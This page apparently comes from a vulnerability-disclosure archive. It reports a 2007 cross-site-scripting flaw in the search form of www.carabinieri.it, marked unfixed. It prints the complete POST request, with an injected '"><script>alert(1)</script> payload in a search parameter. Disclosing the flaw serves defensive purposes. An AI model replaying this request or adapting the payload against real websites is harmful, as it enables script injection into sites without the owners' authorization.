Advertisements:
Security researcher Langy, has submitted on 18/12/2007 a cross-site-scripting (XSS) vulnerability affecting www.carabinieri.it, which at the time of submission ranked 85777 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 18/12/2007 Date published: 18/12/2007 Fixed? Mail us!Status:  UNFIXED
Author: Langy Domain: www.carabinieri.it Category: XSS Pagerank: 85777
URL: http://www.carabinieri.it/Internet/Cerca/default.htm
POST: __VIEWSTATE=dDwwO3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDI%2BOz47bDx0PDtsPGk8Mj47aTwzPjs%2BO2w8dDw7bDxpPDA%2B Oz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjtpPDM%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwzPjtpPDQ%2BOz47bDx0 PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxJc0NoYW5uZWxTZWFyY2g7PjtsPFxlOz4%2BOz47bDxpPDE%2BO2 k8Mj47aTw0Pjs%2BO2w8dDx0PHA8cDxsPERhdGFWYWx1ZUZpZWxkO0RhdGFUZXh0RmllbGQ7PjtsPGtleTt2YWx1ZTs%2BPjs%2B O3Q8aTwzMT47QDxUdXR0byBpbCBwb3J0YWxlO0wnQXJtYTtMJ0FybWEgLSBBc3NvY2lhemlvbmkgZWQgRW50aTtMJ0FybWEgLSBD b0VTUFU7TCdBcm1hIC0gQ3VyaW9zaXTDoDtMJ0FybWEgLSBJZXJpO0wnQXJtYSAtIE9nZ2k7TCdBcm1hIC0gUGFydG5lcnM7SWwg Q2l0dGFkaW5vO0lsIENpdHRhZGlubyAtIENvbnNpZ2xpO0lsIENpdHRhZGlubyAtIERvd25sb2FkO0lsIENpdHRhZGlubyAtIEdp b2NoaTtJbCBDaXR0YWRpbm8gLSBJbmZvcm1hemlvbmk7SWwgQ2l0dGFkaW5vIC0gU2Vydml6aTtDb21tdW5pdHk7Q29tbXVuaXR5 IC0gQ2F0YWxvZ287Q29tbXVuaXR5IC0gQ2hhdDtDb21tdW5pdHkgLSBGb3J1bTtDb21tdW5pdHkgLSBNZXNzZW5nZXI7Q29tbXVu aXR5IC0gTmV3c2xldHRlcjtDb21tdW5pdHkgLSBTb25kYWdnaTtJIENvbmNvcnNpO0kgQ29uY29yc2kgLSBDYWxlbmRhcmlvIENv bmNvcnNpO0kgQ29uY29yc2kgLSBGYXE7SSBDb25jb3JzaSAtIEZvcm1hemlvbmU7SSBDb25jb3JzaSAtIFJlY2x1dGFtZW50bztM J0VkaXRvcmlhO0wnRWRpdG9yaWEgLSBJbCBDYWxlbmRhcmlvIFN0b3JpY287TCdFZGl0b3JpYSAtIElsIENhcmFiaW5pZXJlO0wn RWRpdG9yaWEgLSBQdWJibGljYXppb25pO0wnRWRpdG9yaWEgLSBSYXNzZWduYSBkZWxsJ0FybWE7PjtAPC9JbnRlcm5ldDsvSW50 ZXJuZXQvQXJtYS87L0ludGVybmV0L0FybWEvQXNzb2NpYXppb25pK2VkK0VudGkvOy9JbnRlcm5ldC9Bcm1hL0NvRVNQVS87L0lu dGVybmV0L0FybWEvQ3VyaW9zaXRhLzsvSW50ZXJuZXQvQXJtYS9JZXJpLzsvSW50ZXJuZXQvQXJtYS9PZ2dpLzsvSW50ZXJuZXQv QXJtYS9QYXJ0bmVycy87L0ludGVybmV0L0NpdHRhZGluby87L0ludGVybmV0L0NpdHRhZGluby9Db25zaWdsaS87L0ludGVybmV0 L0NpdHRhZGluby9Eb3dubG9hZC87L0ludGVybmV0L0NpdHRhZGluby9HaW9jaGkvOy9JbnRlcm5ldC9DaXR0YWRpbm8vSW5mb3Jt YXppb25pLzsvSW50ZXJuZXQvQ2l0dGFkaW5vL1NlcnZpemkvOy9JbnRlcm5ldC9Db21tdW5pdHkvOy9JbnRlcm5ldC9Db21tdW5p dHkvQ2F0YWxvZ28vOy9JbnRlcm5ldC9Db21tdW5pdHkvQ2hhdC87L0ludGVybmV0L0NvbW11bml0eS9Gb3J1bS87L0ludGVybmV0 L0NvbW11bml0eS9NZXNzZW5nZXIvOy9JbnRlcm5ldC9Db21tdW5pdHkvTmV3c2xldHRlci87L0ludGVybmV0L0NvbW11bml0eS9T b25kYWdnaS87L0ludGVybmV0L0NvbmNvcnNpLzsvSW50ZXJuZXQvQ29uY29yc2kvQ2FsZW5kYXJpbytDb25jb3JzaS87L0ludGVy bmV0L0NvbmNvcnNpL0ZhcS87L0ludGVybmV0L0NvbmNvcnNpL0Zvcm1hemlvbmUvOy9JbnRlcm5ldC9Db25jb3JzaS9SZWNsdXRh bWVudG8vOy9JbnRlcm5ldC9FZGl0b3JpYS87L0ludGVybmV0L0VkaXRvcmlhL0NhbGVuZGFyaW8rU3Rvcmljby87L0ludGVybmV0 L0VkaXRvcmlhL0NhcmFiaW5pZXJlLzsvSW50ZXJuZXQvRWRpdG9yaWEvUHViYmxpY2F6aW9uaS87L0ludGVybmV0L0VkaXRvcmlh L1Jhc3NlZ25hK0FybWEvOz4%2BOz47Oz47dDx0PDt0PGk8ND47QDxBbG1lbm8gdW5hIHBhcm9sYTtUdXR0ZSBsZSBwYXJvbGU7TG EgZnJhc2UgZXNhdHRhO0xhIGZyYXNlIGNoZSBpbml6aWEgY29uLi4uOz47QDwwOzE7MjszOz4%2BOz47Oz47dDx0PDtwPGw8aTww PjtpPDE%2BO2k8Mj47aTwzPjs%2BO2w8cDwxMDsxMD47cDwyMDsyMD47cDw1MDs1MD47cDwxMDA7MTAwPjs%2BPjs%2BOzs%2BOz 4%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PHA8bDxocmVmOz47bDxodHRwOi8vd3d3LmNhcmFi aW5pZXJpLml0L0ludGVybmV0L0NlcmNhL2RlZmF1bHQuaHRtOz4%2BOzs%2BOz4%2BOz4%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs% 2BO2w8dDw7bDxpPDE%2BOz47bDx0PHA8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPj t0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs%2BO2w8 dDxwPHA8bDxUZXh0Oz47bDxQYWdpbmEgYWdnaW9ybmF0YSBhbCBcPGJcPjE1LzExLzIwMDVcPC9iXD47Pj47Pjs7Pjs%2BPjs%2B Pjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2B&_ctl55%3A_ctl0%3Aitem=%27%22%3E%3Cscript%3Ealert%281%29%3 C%2Fscript%3E&_ctl55%3A_ctl0%3ADdlChannels=%2FInternet&_ctl55%3A_ctl0%3AFreeTextMode=0&_ctl55%3A_ctl 0%3AbtInvia=Esegui+la+ricerca&_ctl55%3A_ctl0%3AlbPagesize=10
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense 		Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.